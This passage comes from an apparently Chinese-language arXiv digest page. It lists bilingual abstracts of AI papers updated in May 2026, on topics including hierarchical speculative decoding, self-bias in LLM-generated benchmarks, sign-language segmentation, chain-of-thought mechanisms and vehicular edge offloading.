modalities. The results show that PTA-GRPO consistently delivers significant improvements across models and tasks, demonstrating strong effectiveness and generalization.

2510.01336 2026-05-27 cs.CL cs.AI cs.LG 版本更新

HiSpec: Hierarchical Speculative Decoding for LLMs

HiSpec: 分层推测解码用于大语言模型

Avinash Kumar, Sujay Sanghavi, Poulami Das

发表机构 * Department of Electrical and Computer Engineering, The University of Texas at Austin(德克萨斯大学奥斯汀分校电子与计算机工程系)

AI总结 提出HiSpec框架,利用早期退出模型进行低开销中间验证,通过重用键值缓存和隐藏状态提高吞吐量,平均加速1.28倍,最高2.01倍,且不损失准确性。

详情
AI中文摘要

推测解码通过使用较小的草稿模型推测令牌,再由较大的目标模型验证,从而加速LLM推理。验证通常是瓶颈(例如,当3B模型为70B目标模型推测时,验证速度比令牌生成慢4倍),但大多数先前工作只关注加速草稿生成。“中间”验证通过早期丢弃不准确的草稿令牌来减少验证时间,但现有方法在引入中间验证器时会产生大量训练开销,增加内存占用以协调中间验证步骤,并依赖近似启发式方法损害准确性。我们提出分层推测解码(Hierarchical Speculative Decoding,HiSpec),一种高吞吐量推测解码框架,利用早期退出模型进行低开销中间验证。早期退出模型允许令牌通过跳过层遍历提前退出,并经过显式训练,使得选定层的隐藏状态可解释,从而在不显著增加计算和内存开销的情况下,非常适合中间验证。为了进一步提高资源效率,我们设计了一种方法,使HiSpec能够在草稿模型、中间验证器和目标模型之间重用键值缓存和隐藏状态。为了保持准确性,HiSpec定期针对目标模型验证中间验证器接受的草稿令牌。我们在各种代表性基准和模型上的评估表明,与基线单层推测相比,HiSpec平均提高吞吐量1.28倍,最高达2.01倍,且不损失准确性。

英文摘要

Speculative decoding accelerates LLM inference by using a smaller draft model to speculate tokens that a larger target model verifies. Verification is often the bottleneck (e.g., verification is 4× slower than token generation when a 3B model speculates for a 70B target model), but most prior works focus only on accelerating drafting. "Intermediate" verification reduces verification time by discarding inaccurate draft tokens early, but existing methods incur substantial training overheads in incorporating the intermediate verifier, increase the memory footprint to orchestrate the intermediate verification step, and compromise accuracy by relying on approximate heuristics. We propose Hierarchical Speculative Decoding (HiSpec), a framework for high-throughput speculative decoding that exploits early-exit (EE) models for low-overhead intermediate verification. EE models allow tokens to exit early by skipping layer traversal and are explicitly trained so that hidden states at selected layers can be interpreted, making them uniquely suited for intermediate verification without drastically increasing compute and memory overheads. To improve resource-efficiency even further, we design a methodology that enables HiSpec to re-use key-value caches and hidden states between the draft, intermediate verifier, and target models. To maintain accuracy, HiSpec periodically validates the draft tokens accepted by the intermediate verifier against the target model. Our evaluations using various representative benchmarks and models show that HiSpec improves throughput by 1.28× on average and by up to 2.01× compared to the baseline single-layer speculation without compromising accuracy.
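The draft, intermediate-verify, target-verify flow described above can be sketched with toy greedy models. This is a simplified illustration, not HiSpec itself: the three `*_next` callables are hypothetical stand-ins for real models, the target checks every round rather than periodically, verification is written as a sequential loop instead of one batched forward pass, and no key-value cache reuse is modelled.

```python
def speculative_step(prefix, draft_next, verifier_next, target_next, k=4):
    """One greedy speculation round with an intermediate verifier.

    Each *_next argument is a hypothetical callable that maps a token list
    to the next token under greedy decoding.
    """
    # 1. The draft model proposes k tokens autoregressively.
    proposed = []
    for _ in range(k):
        proposed.append(draft_next(prefix + proposed))

    # 2. The intermediate verifier keeps the longest prefix it agrees with,
    #    discarding doubtful draft tokens before the target sees them.
    kept = []
    for tok in proposed:
        if verifier_next(prefix + kept) != tok:
            break
        kept.append(tok)

    # 3. The target checks the survivors. On the first mismatch it
    #    substitutes its own token and stops; otherwise it appends one
    #    extra token. Either way the output matches target-only decoding.
    accepted = []
    for tok in kept:
        expected = target_next(prefix + accepted)
        if expected != tok:
            accepted.append(expected)
            return prefix + accepted
        accepted.append(tok)
    accepted.append(target_next(prefix + accepted))
    return prefix + accepted

# Toy models: the target emits position mod 5; the draft agrees with it;
# the verifier agrees only for the first three positions.
target = lambda seq: len(seq) % 5
draft = lambda seq: len(seq) % 5
verifier = lambda seq: len(seq) % 5 if len(seq) < 3 else 9

out = speculative_step([], draft, verifier, target, k=4)
```

Because the target has the final say on every emitted token in this sketch, a weak intermediate verifier can only cost speed, never change the output.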

2509.26600 2026-05-27 cs.CL cs.AI 版本更新

When LLMs Benchmark Themselves: Deconstructing Self-Bias in Automated Evaluation

当LLM自我基准测试:解构自动评估中的自我偏见

Wenda Xu, Sweta Agrawal, Vilém Zouhar, Markus Freitag, Daniel Deutsch

发表机构 * Google(谷歌) ETH Zurich(苏黎世联邦理工学院)

AI总结 研究LLM自动创建基准测试时存在的自我偏见问题,发现测试集生成和评估两个环节均产生偏见,导致模型偏爱自身输出,并提出了多样性指标以部分缓解该偏见。

详情
AI中文摘要

随着LLM迅速饱和现有基准测试,使用LLM自动创建基准测试(LLM-as-a-benchmark)——即模型生成测试输入(LLM-as-a-testset)并评估输出(LLM-as-an-evaluator)——已成为人工策划的廉价替代方案。我们表明,这种范式存在一个根本问题:LLM生成的基准测试系统性地偏爱创建它们的模型。以机器翻译为主要测试平台,我们发现自我偏见源于两个叠加来源:LLM-as-a-testset和LLM-as-an-evaluator,它们的组合放大了这种效应。关键的是,即使测试数据在显式多样性控制下生成,每个模型的隐式风格倾向也会产生同质的、模型特定的输出,从而抬高其自身分数。使用我们提出的多样性度量增加源文本多样性,可以部分缓解这种偏见。自我偏见足够强,以至于每个模型都将自己排在首位,覆盖了同行共识排序。我们确认该现象扩展到Chatbot Arena任务上的开放式生成。

英文摘要

As LLMs rapidly saturate existing benchmarks, automated benchmark creation using LLMs (LLM-as-a-benchmark) -- where a model generates test inputs (LLM-as-a-testset) and evaluates outputs (LLM-as-an-evaluator) -- has gained traction as a cheap alternative to human curation. We show that this paradigm has a fundamental problem: LLM-generated benchmarks systematically favor the model that created them. Using machine translation as our primary testbed, we find that self-bias arises from two additive sources, LLM-as-a-testset and LLM-as-an-evaluator, and their combination amplifies the effect. Crucially, even when test data is generated with explicit diversity controls, each model's implicit stylistic tendencies produce homogeneous, model-specific outputs that inflate its own scores. Increasing source text diversity, using our proposed diversity metric, partially mitigates this bias. Self-bias is strong enough to cause each model to rank itself first, overriding the peer-consensus ordering. We confirm that the phenomenon extends to open-ended generation on the Chatbot Arena task.

2509.04632 2026-05-27 cs.DB cs.AI 版本更新

Conceptual Schema Inference for Tabular Datasets using Large Language Models

使用大型语言模型对表格数据集进行概念模式推断

Zhenyu Wu, Jiaoyan Chen, Norman W. Paton

发表机构 * The University of Manchester(曼彻斯特大学)

AI总结 本文提出两种基于大型语言模型的方法,从原始表格中自动推断概念模式,包括实体类型、属性和类型间关系,以解决异构表格数据的一致性问题。

详情
AI中文摘要

来自数据湖、网络表格和开放数据门户的大量表格数据通常源自异构源,导致表示不一致。因此,理解和组织此类存储库仍然是一个重大挑战。虽然先前的工作主要关注数据集发现和探索,但本文解决了概念模式推断的补充问题:自动从原始表格中推导出捕获实体类型、属性和类型间关系的概念模式。我们提出了两种基于大型语言模型(LLM)的方法,仅使用列标题和单元格值:GeSI使用生成式LLM从表格和列级语义推断层次化类型及其属性,并将它们集成到全局模式中,该模式还捕获跨类型的关系;EmSI使用基于LLM的表格嵌入按列级语义对表格进行分组,推断每组内的属性,并从共享属性模式构建层次结构。最后,我们报告了一项实验分析,展示了我们的方法在推断模式组件的简洁性和结构质量、对大型存储库的可扩展性方面的有效性,以及一个说明端到端模式推断的案例研究。

英文摘要

Large collections of tabular data from data lakes, web tables and open data portals often originate from heterogeneous sources, leading to representational inconsistencies. Understanding and organizing such repositories therefore remains a major challenge. While prior work has primarily focused on dataset discovery and exploration, this paper addresses the complementary problem of conceptual schema inference: automatically deriving a conceptual schema that captures entity types, attributes and inter-type relationships directly from raw tables. We propose two large language model (LLM)-based approaches that use only column headers and cell values: GeSI uses generative LLMs to infer hierarchical types and their attributes from table- and column-level semantics, and to integrate them into a global schema that also captures relationships across types; EmSI employs LLM-based table embeddings to group tables by column-level semantics, infer attributes within each group, and construct hierarchical structures from shared attribute patterns. Finally, we report an experimental analysis demonstrating the effectiveness of our approaches in terms of the conciseness and structural quality of the inferred schema components, their scalability to large repositories, and a case study illustrating end-to-end schema inference.

2508.18444 2026-05-27 cs.CL cs.AI 版本更新

How Reliable are LLMs for Reasoning on the Re-ranking task?

LLMs在重排序任务上的推理有多可靠?

Nafis Tanveer Islam, Zhiming Zhao

发表机构 * Multiscale Networked Systems (MNS) Group, University of Amsterdam(多尺度网络系统(MNS)组,阿姆斯特丹大学)

AI总结 本研究分析不同训练方法对LLMs在重排序任务中语义理解的影响,并探究模型能否生成更知情的文本推理以克服透明度和数据有限的挑战。

Comments This chapter has been published in Advancements in AI From Foundations to Cross-Disciplinary Applications, Springer, 2026

详情
AI中文摘要

随着大型语言模型(LLMs)语义理解能力的提升,它们表现出对人类价值观更高的认知和对齐,但这以牺牲透明度为代价。尽管通过实验分析取得了有希望的结果,但深入理解LLM的内部工作机制对于理解重排序背后的推理是必不可少的,这为最终用户提供了解释,使他们能够做出明智的决定。此外,在新开发的系统中,用户参与有限且排序数据不足,准确地对内容进行重排序仍然是一个重大挑战。虽然各种训练方法影响LLMs的训练并生成推理,但我们的分析发现,一些训练方法比其他方法表现出更好的可解释性,这意味着并非所有训练方法都学到了准确的语义理解;相反,获得了抽象知识以优化评估,这引发了对LLMs真正可靠性的质疑。因此,在这项工作中,我们分析了不同训练方法如何影响LLMs在重排序任务中的语义理解,并调查这些模型是否能够生成更知情的文本推理,以克服LLMs透明度不足和训练数据有限的挑战。为了分析用于重排序任务的LLMs,我们利用来自环境和地球科学领域的相对较小的排序数据集来对检索到的内容进行重排序。此外,我们还分析了可解释信息,以查看是否可以使用可解释性对重排序进行推理。

英文摘要

With the improving semantic understanding capability of Large Language Models (LLMs), they exhibit a greater awareness and alignment with human values, but this comes at the cost of transparency. Although promising results are achieved via experimental analysis, an in-depth understanding of the LLM's internal workings is necessary to comprehend the reasoning behind the re-ranking, which provides end users with an explanation that enables them to make an informed decision. Moreover, in newly developed systems with limited user engagement and insufficient ranking data, accurately re-ranking content remains a significant challenge. While various training methods affect the training of LLMs and generate inference, our analysis has found that some training methods exhibit better explainability than others, implying that an accurate semantic understanding has not been learned through all training methods; instead, abstract knowledge has been gained to optimize evaluation, which raises questions about the true reliability of LLMs. Therefore, in this work, we analyze how different training methods affect the semantic understanding of the re-ranking task in LLMs and investigate whether these models can generate more informed textual reasoning to overcome the challenges of limited LLM transparency and limited training data. To analyze the LLMs for re-ranking tasks, we utilize a relatively small ranking dataset from the environment and the Earth science domain to re-rank retrieved content. Furthermore, we also analyze the explainable information to see if the re-ranking can be reasoned using explainability.

2504.08593 2026-05-27 cs.CV cs.AI 版本更新

Hands-On: Segmenting Individual Signs from Continuous Sequences

Hands-On:从连续序列中分割单个手语词

JianHe Low, Harry Walsh, Ozge Mercanoglu Sincan, Richard Bowden

发表机构 * CVSSP, University of Surrey(CVSSP,萨里大学)

AI总结 针对连续手语分割难题,提出基于Transformer的架构,利用HaMeR手部特征和3D角度,采用BIO标注方案建模时序动态,在DGS语料库上达到最优性能。

Comments Accepted in the 19th IEEE International Conference on Automatic Face and Gesture Recognition. Code Implementation Released

详情
Journal ref
IEEE 19th International Conference on Automatic Face and Gesture Recognition. (2025) 1-5
AI中文摘要

这项工作解决了连续手语分割的挑战,这是一项对手语翻译和数据标注具有重大影响的关键任务。我们提出了一种基于Transformer的架构,该架构对手语的时序动态进行建模,并使用开始-内部-外部(BIO)标注方案将分割视为序列标注问题。我们的方法利用了HaMeR手部特征,并辅以3D角度。大量实验表明,我们的模型在DGS语料库上取得了最先进的结果,而我们的特征在BSLCorpus上超越了先前的基准。

英文摘要

This work tackles the challenge of continuous sign language segmentation, a key task with huge implications for sign language translation and data annotation. We propose a transformer-based architecture that models the temporal dynamics of signing and frames segmentation as a sequence labeling problem using the Begin-In-Out (BIO) tagging scheme. Our method leverages the HaMeR hand features, and is complemented with 3D Angles. Extensive experiments show that our model achieves state-of-the-art results on the DGS Corpus, while our features surpass prior benchmarks on BSLCorpus.
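As a minimal sketch of how the BIO scheme turns segmentation into sequence labeling, per-frame tags can be decoded into sign spans as shown below. The function name `bio_to_segments` and the toy tag sequence are illustrative assumptions, not the authors' released code.

```python
def bio_to_segments(tags):
    """Decode per-frame BIO tags into (start, end) frame spans (end inclusive).

    "B" marks the first frame of a sign, "I" a frame inside a sign,
    and "O" a frame outside any sign.
    """
    segments = []
    start = None  # start frame of the sign currently being read, if any
    for i, tag in enumerate(tags):
        if tag == "B":
            # A new sign begins; close the previous one if it is still open.
            if start is not None:
                segments.append((start, i - 1))
            start = i
        elif tag == "I":
            # Tolerate an "I" with no preceding "B" by opening a sign here.
            if start is None:
                start = i
        else:
            # "O": close any open sign.
            if start is not None:
                segments.append((start, i - 1))
                start = None
    # Close a sign that runs to the end of the sequence.
    if start is not None:
        segments.append((start, len(tags) - 1))
    return segments


frame_tags = list("OBIIOBIBIO")  # hypothetical per-frame predictions
print(bio_to_segments(frame_tags))  # [(1, 3), (5, 6), (7, 8)]
```

The "B" tag is what lets two back-to-back signs (frames 5-6 and 7-8 here) be separated without an intervening "O" frame.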

2508.00748 2026-05-27 cs.CV cs.AI cs.CR cs.MM 版本更新

Is It Really You? Exploring Biometric Verification Scenarios in Photorealistic Talking-Head Avatar Videos

真的是你吗?探索逼真说话头像视频中的生物特征验证场景

Laura Pedrouzo-Rodriguez, Pedro Delgado-DeRobles, Luis F. Gomez, Ruben Tolosana, Ruben Vera-Rodriguez, Aythami Morales, Julian Fierrez

发表机构 * Biometrics and Data Pattern Analytics Lab(生物特征与数据模式分析实验室)

AI总结 本文研究在逼真说话头像视频中,利用面部运动模式作为行为生物特征进行身份验证,提出基于图卷积网络的轻量级模型,AUC接近80%。

Comments Accepted at the IEEE International Joint Conference on Biometrics (IJCB 2025)

详情
Journal ref
2025 IEEE International Joint Conference on Biometrics (IJCB)
AI中文摘要

逼真说话头像在虚拟会议、游戏和社交平台中越来越常见。这些头像允许更沉浸式的交流,但也引入了严重的安全风险。一个新兴威胁是冒充:攻击者可以窃取用户的头像,保留其外观和声音,使得仅凭视觉或听觉几乎无法检测欺诈性使用。在本文中,我们探讨了在这种头像中介场景中生物特征验证的挑战。我们的主要问题是,当头像的视觉外观是其主人的复制品时,个体的面部运动模式能否作为可靠的行为生物特征来验证其身份。为了回答这个问题,我们引入了一个新的数据集,其中包含使用最先进的一次性头像生成模型GAGAvatar创建的逼真头像视频,包括真实和冒充的头像视频。我们还提出了一种轻量级、可解释的时空图卷积网络架构,具有时间注意力池化,仅使用面部标志点来建模动态面部手势。实验结果表明,面部运动线索能够实现有意义的身份验证,AUC值接近80%。所提出的基准和生物特征系统可供研究社区使用,以引起对基于头像的通信系统中更高级行为生物特征防御的迫切需求的关注。

英文摘要

Photorealistic talking-head avatars are becoming increasingly common in virtual meetings, gaming, and social platforms. These avatars allow for more immersive communication, but they also introduce serious security risks. One emerging threat is impersonation: an attacker can steal a user's avatar, preserving his appearance and voice, making it nearly impossible to detect its fraudulent usage by sight or sound alone. In this paper, we explore the challenge of biometric verification in such avatar-mediated scenarios. Our main question is whether an individual's facial motion patterns can serve as reliable behavioral biometrics to verify their identity when the avatar's visual appearance is a facsimile of its owner. To answer this question, we introduce a new dataset of realistic avatar videos created using a state-of-the-art one-shot avatar generation model, GAGAvatar, with genuine and impostor avatar videos. We also propose a lightweight, explainable spatio-temporal Graph Convolutional Network architecture with temporal attention pooling, that uses only facial landmarks to model dynamic facial gestures. Experimental results demonstrate that facial motion cues enable meaningful identity verification with AUC values approaching 80%. The proposed benchmark and biometric system are available for the research community in order to bring attention to the urgent need for more advanced behavioral biometric defenses in avatar-based communication systems.

2507.20758 2026-05-27 cs.AI 版本更新

How Chain-of-Thought Works? Tracing Information Flow from Decoding, Projection, and Activation

思维链如何工作?从解码、投影和激活追踪信息流

Hao Yang, Qinghua Zhao, Lei Li, Lingyi Meng, Mengda Yu

发表机构 * State Key Laboratory for Novel Software Technology, Nanjing University(南京大学新型软件技术国家重点实验室) School of Artificial Intelligence and Big Data, Hefei University(合肥大学人工智能与大数据学院) School of Artificial Intelligence, Beijing Institute of Technology(北京理工大学人工智能学院) School of Computing and Information, University of Pittsburgh(匹兹堡大学计算机与信息学院) Center for Biostatistics, The Ohio State University Wexner Medical Center(俄亥俄州立大学韦克斯纳医学中心生物统计中心)

AI总结 通过反向追踪解码、投影和激活阶段的信息流,揭示思维链作为解码空间剪枝器的作用,并发现其以任务依赖方式调节神经元激活。

Comments Accepted by ACL 2026

详情
AI中文摘要

思维链提示显著增强了模型推理能力,但其内部机制仍知之甚少。我们通过反向追踪解码、投影和激活阶段的信息流来分析CoT的操作原理。我们的定量分析表明,CoT可能作为解码空间剪枝器,利用答案模板引导输出生成,更高的模板遵循度与性能提升强相关。此外,我们惊讶地发现CoT以任务依赖方式调节神经元参与:在开放领域任务中减少神经元激活,而在封闭领域场景中增加激活。这些发现提供了一个新颖的机制可解释性框架,并为实现有针对性的CoT干预以设计更高效和鲁棒的提示提供了关键见解。我们在https://anonymous.4open.science/r/cot-D247发布了代码和数据。

英文摘要

Chain-of-Thought (CoT) prompting significantly enhances model reasoning, yet its internal mechanisms remain poorly understood. We analyze CoT's operational principles by reversely tracing information flow across decoding, projection, and activation phases. Our quantitative analysis suggests that CoT may serve as a decoding space pruner, leveraging answer templates to guide output generation, with higher template adherence strongly correlating with improved performance. Furthermore, we surprisingly find that CoT modulates neuron engagement in a task-dependent manner: reducing neuron activation in open-domain tasks, yet increasing it in closed-domain scenarios. These findings offer a novel mechanistic interpretability framework and critical insights for enabling targeted CoT interventions to design more efficient and robust prompts. We released our code and data at https://anonymous.4open.science/r/cot-D247.

2506.21443 2026-05-27 cs.CL cs.AI 版本更新

Domain Knowledge-Enhanced LLMs for Fraud and Concept Drift Detection

领域知识增强的大语言模型用于欺诈和概念漂移检测

Ali Şenol, Garima Agrawal, Huan Liu

发表机构 * School of Computing and Augmented Intelligence (SCAI), Arizona State University (ASU)(计算与增强智能学院(SCAI),亚利桑那州立大学) Department of Computer Engineering, Tarsus University(计算机工程系,塔尔苏斯大学) Minerva CQ and HumaConn AI Consulting(Minerva CQ和HumaConn人工智能咨询) School of Computing and Augmented Intelligence (SCAI), Arizona State University(计算与增强智能学院(SCAI),亚利桑那州立大学)

AI总结 提出一种领域知识增强的大语言模型框架,通过集成结构化领域知识和漂移检测单元,实现高准确率的欺诈对话检测和概念漂移分类。

详情
AI中文摘要

在动态平台上检测欺骗性对话变得越来越困难,原因是语言模式的演变和概念漂移(CD)——即随着时间推移,语义或主题的转变会改变交互的上下文或意图。这些转变可能掩盖恶意意图或模仿正常对话,使得准确分类具有挑战性。尽管大语言模型(LLMs)在自然语言任务中表现出色,但在风险敏感场景中,它们常常面临上下文模糊和幻觉问题。为了解决这些挑战,我们提出了一个领域知识(DK)增强的LLM框架,该框架将预训练的LLM与结构化的、任务特定的见解相结合,以执行欺诈和概念漂移检测。所提出的架构由三个主要组件组成:(1)一个DK-LLM模块,用于检测虚假或欺骗性对话;(2)一个漂移检测单元(OCDD),用于判断是否发生了语义转变;(3)第二个DK-LLM模块,用于将漂移分类为良性或欺诈性。我们首先使用虚假评论数据集验证领域知识的价值,然后将我们的完整框架应用于SEConvo,一个包含多种欺诈和垃圾攻击的多轮对话数据集。结果表明,我们的系统能够高精度地检测虚假对话,并有效分类漂移的性质。在结构化提示的引导下,基于LLaMA的实现达到了98%的分类准确率。与零样本基线的对比研究表明,在高风险NLP应用中,融入领域知识和漂移意识显著提高了性能、可解释性和鲁棒性。

英文摘要

Detecting deceptive conversations on dynamic platforms is increasingly difficult due to evolving language patterns and Concept Drift (CD), i.e., semantic or topical shifts that alter the context or intent of interactions over time. These shifts can obscure malicious intent or mimic normal dialogue, making accurate classification challenging. While Large Language Models (LLMs) show strong performance in natural language tasks, they often struggle with contextual ambiguity and hallucinations in risk-sensitive scenarios. To address these challenges, we present a Domain Knowledge (DK)-Enhanced LLM framework that integrates pretrained LLMs with structured, task-specific insights to perform fraud and concept drift detection. The proposed architecture consists of three main components: (1) a DK-LLM module to detect fake or deceptive conversations; (2) a drift detection unit (OCDD) to determine whether a semantic shift has occurred; and (3) a second DK-LLM module to classify the drift as either benign or fraudulent. We first validate the value of domain knowledge using a fake review dataset and then apply our full framework to SEConvo, a multi-turn dialogue dataset that includes various types of fraud and spam attacks. Results show that our system detects fake conversations with high accuracy and effectively classifies the nature of drift. Guided by structured prompts, the LLaMA-based implementation achieves 98% classification accuracy. Comparative studies against zero-shot baselines demonstrate that incorporating domain knowledge and drift awareness significantly improves performance, interpretability, and robustness in high-stakes NLP applications.

2506.17633 2026-05-27 cs.CV cs.AI 版本更新

Adaptive Multi-prompt Contrastive Network for Few-shot Out-of-distribution Detection

自适应多提示对比网络用于少样本分布外检测

Xiang Fang, Arvind Easwaran, Blaise Genest

发表机构 * College of Computing and Data Science, Nanyang Technological University, Singapore(南洋理工大学计算与数据科学学院,新加坡)

AI总结 针对少样本分布外检测问题,提出自适应多提示对比网络(AMCN),通过CLIP学习可学习文本提示和类间/类内分布,实现ID-OOD分离边界自适应。

Comments Published in ICML 2025

详情
AI中文摘要

分布外(OOD)检测旨在区分异常样本,以防止在分布内(ID)数据集上训练的模型产生不可用的输出。大多数OOD检测方法需要大量IID样本进行训练,这严重限制了它们的实际应用。为此,我们针对一个具有挑战性的场景:少样本OOD检测,其中只有少量标记的ID样本可用。因此,少样本OOD检测比传统的OOD检测设置更具挑战性。先前的少样本OOD检测工作忽略了不同类别之间的显著多样性。在本文中,我们提出了一种新颖的网络:自适应多提示对比网络(AMCN),它通过学习类间和类内分布来适应ID-OOD分离边界。为了弥补OOD的缺失和ID图像样本的稀缺,我们利用CLIP连接文本与图像,设计可学习的ID和OOD文本提示。具体来说,我们首先生成自适应提示(可学习ID提示、标签固定OOD提示和标签自适应OOD提示)。然后,我们通过引入类级阈值为每个类生成自适应类边界。最后,我们提出一个提示引导的ID-OOD分离模块来控制ID和OOD提示之间的间隔。实验结果表明,AMCN优于其他最先进的工作。

英文摘要

Out-of-distribution (OOD) detection attempts to distinguish outlier samples to prevent models trained on the in-distribution (ID) dataset from producing unavailable outputs. Most OOD detection methods require many IID samples for training, which seriously limits their real-world applications. To this end, we target a challenging setting: few-shot OOD detection, where only a few labeled ID samples are available. Therefore, few-shot OOD detection is much more challenging than the traditional OOD detection setting. Previous few-shot OOD detection works ignore the distinct diversity between different classes. In this paper, we propose a novel network: Adaptive Multi-prompt Contrastive Network (AMCN), which adapts the ID-OOD separation boundary by learning inter- and intra-class distribution. To compensate for the absence of OOD and scarcity of ID image samples, we leverage CLIP, connecting text with images, engineering learnable ID and OOD textual prompts. Specifically, we first generate adaptive prompts (learnable ID prompts, label-fixed OOD prompts and label-adaptive OOD prompts). Then, we generate an adaptive class boundary for each class by introducing a class-wise threshold. Finally, we propose a prompt-guided ID-OOD separation module to control the margin between ID and OOD prompts. Experimental results show that AMCN outperforms other state-of-the-art works.

2506.10225 2026-05-27 cs.SD cs.AI eess.AS 版本更新

Genre Controlled Music Generation via Activation Steering

通过激活引导实现体裁控制的音乐生成

Swathi Narashiman, Pranay Mathur, Dipanshu Panda, Jayden Koshy Joe, Harshith M R, Anish Veerakumar, Aniruddh Krishna, Keerthiharan A

发表机构 * Indian Institute of Technology Madras(印度理工学院马德拉斯分校)

AI总结 提出一种在推理时对自回归生成模型MusicGen进行干预的方法,利用线性探针权重引导残差流,实现细粒度的体裁控制。

详情
AI中文摘要

计算音乐生成正朝着非传统风格发展,需要能够精确且可控地融合不同音乐元素的方法。在这项工作中,我们提出了一种方法,通过对自回归生成变换器MusicGen进行推理时干预来实现细粒度控制。通过我们的方法,我们利用线性探针在残差流上的权重来引导残差流,从而实现体裁控制。通过将激活引导视为一种人类可控的交互,我们的工作突出了可解释的模型行为如何在协同创作的音乐生成中发挥作用。展示我们方法的音频样本可在我们的演示页面上找到。

英文摘要

Computational Music Generation is evolving towards non-conventional styles, demanding methods that enable precise and controllable blending of diverse music elements. In this work, we present a method for fine-grained control using inference-time interventions on an autoregressive generative transformer, MusicGen. Through our approach, we achieve genre control by steering the residual stream using weights of a linear probe on it. By framing activation steering as a human-controllable interaction, our work highlights how interpretable model behaviors can empower co-creative music generation. Audio samples demonstrating our method are available on our demo page.
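To make the idea of steering a residual stream with probe weights concrete, here is a minimal sketch. It assumes the intervention adds the unit-normalized probe direction, scaled by a user-chosen strength `alpha`, to a hidden vector; the abstract does not state the exact update rule, and the names `steer`, `probe_logit`, and `alpha` are hypothetical.

```python
import math


def probe_logit(hidden, probe_weights, bias=0.0):
    """Score of a linear probe (e.g. a one-genre classifier) on a hidden vector."""
    return sum(h * w for h, w in zip(hidden, probe_weights)) + bias


def steer(hidden, probe_weights, alpha):
    """Shift a hidden vector along the probe direction (assumed update rule).

    The probe weights are normalized to unit length so that alpha directly
    controls how far the activation moves.
    """
    norm = math.sqrt(sum(w * w for w in probe_weights))
    if norm == 0:
        return list(hidden)  # no direction to steer along
    return [h + alpha * w / norm for h, w in zip(hidden, probe_weights)]


hidden = [0.0, 0.0]          # toy residual-stream activation
genre_probe = [3.0, 4.0]     # toy probe weights for one genre
steered = steer(hidden, genre_probe, alpha=5)
print(steered)                               # [3.0, 4.0]
print(probe_logit(steered, genre_probe))     # 25.0
```

Under this assumption the probe score rises linearly with `alpha`, which is what makes the strength of the genre shift a directly controllable knob.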

2506.07813 2026-05-27 cs.CV cs.AI 版本更新

Self-Cascaded Diffusion Models for Arbitrary-Scale Image Super-Resolution

自级联扩散模型用于任意尺度图像超分辨率

Junseo Bang, Joonhee Lee, Kyeonghyun Lee, Haechang Lee, Dong Un Kang, Se Young Chun

发表机构 * Department of Electrical and Computer Engineering (ECE), Seoul National University(电气与计算机工程系(ECE),首尔国立大学) Institute of New Media and Communications (INMC) & Interdisciplinary Program in AI (IPAI), Seoul National University(新媒体与通讯研究所(INMC)及人工智能跨学科项目(IPAI),首尔国立大学)

AI总结 提出自级联扩散框架CasArbi,通过将任意缩放因子分解为连续小步骤,逐步提升分辨率并保持尺度一致性,在感知和失真指标上优于现有方法。

详情
AI中文摘要

任意尺度图像超分辨率旨在将图像上采样到任意期望分辨率,比传统固定尺度超分辨率提供更大灵活性。最近基于回归或生成模型的方法显示出有希望的结果,但由于其单阶段公式必须同时处理大范围的缩放因子,常常遭受尺度不一致的问题。为了解决这个问题,我们提出了CasArbi,一个用于任意尺度图像超分辨率的自级联扩散框架。CasArbi将不同的缩放因子分解为更小的顺序步骤,逐步提升图像分辨率,并在每一步实现任意尺度的无缝过渡。CasArbi利用坐标条件扩散模型学习连续图像表示,并在推理时采用自一致性指导生成尺度一致的细节。大量实验表明,CasArbi在感知和失真指标上均优于现有方法,并在各种任意尺度超分辨率基准上展现出卓越的尺度一致性。我们的代码可在https://github.com/junseo88/CasArbi获取。

英文摘要

Arbitrary-scale image super-resolution aims to upsample images to any desired resolution, offering greater flexibility than traditional fixed-scale super-resolution. Recent approaches based on regression-based or generative models have shown promising results but often suffer from scale inconsistency due to their single-stage formulation, which must handle a wide range of scaling factors simultaneously. To address this, we propose CasArbi, a self-cascaded diffusion framework for arbitrary-scale image super-resolution. CasArbi decomposes varying scaling factors into smaller sequential steps, progressively enhancing the image resolution at each step with seamless transitions for arbitrary scales. CasArbi leverages a coordinate-conditioned diffusion model for learning continuous image representations and adopts self-consistency guidance to generate scale-consistent details at inference time. Extensive experiments show that CasArbi outperforms existing methods in both perceptual and distortion metrics and demonstrates superior scale consistency across diverse arbitrary-scale super-resolution benchmarks. Our code is available at https://github.com/junseo88/CasArbi.
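One simple way to picture the decomposition of a large scaling factor into smaller sequential steps is sketched below. The equal-ratio schedule and the `max_step` cap are assumptions made for illustration; the abstract does not specify how CasArbi actually chooses its steps, and `split_scale` is a hypothetical helper.

```python
import math


def split_scale(target_scale, max_step=2.0):
    """Split an upsampling factor into equal per-step factors, each <= max_step.

    The product of the returned factors equals target_scale (up to rounding).
    """
    if target_scale < 1.0 or max_step <= 1.0:
        raise ValueError("expected target_scale >= 1 and max_step > 1")
    if target_scale == 1.0:
        return []  # nothing to upsample
    # Smallest number of steps such that every step stays within max_step.
    # The small epsilon guards against log ratios like 2.0000000000000004.
    n_steps = max(1, math.ceil(math.log(target_scale) / math.log(max_step) - 1e-9))
    step = target_scale ** (1.0 / n_steps)
    return [step] * n_steps


for s in (1.5, 4.0, 6.0):
    steps = split_scale(s)
    print(s, len(steps), [round(f, 3) for f in steps])
```

With the default cap, a factor of 6 becomes three steps of roughly 1.817 each, so no single stage has to handle the full range of scales at once.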

2502.06963 2026-05-27 cs.LG cs.AI cs.DC cs.MA 版本更新

Intelligent Offloading in Vehicular Edge Computing: A Comprehensive Review of Deep Reinforcement Learning Approaches and Architectures

车辆边缘计算中的智能卸载:深度强化学习方法与架构综述

Ashab Uddin, Ahmed Hamdi Sakr, Ning Zhang

发表机构 * Department of Electrical and Computer Engineering, University of Windsor(温莎大学电气与计算机工程系)

AI总结 本文综述了基于深度强化学习的车辆边缘计算卸载方法,分类比较了学习范式、系统架构和优化目标,并分析了马尔可夫决策过程的应用及未来研究方向。

Comments 33 Pages, 6 Figures, 7 Tables. Machine Learning, Reinforcement Learning, Multi Agent Reinforcement Learning, Computational Offloading and Edge Computing

详情
AI中文摘要

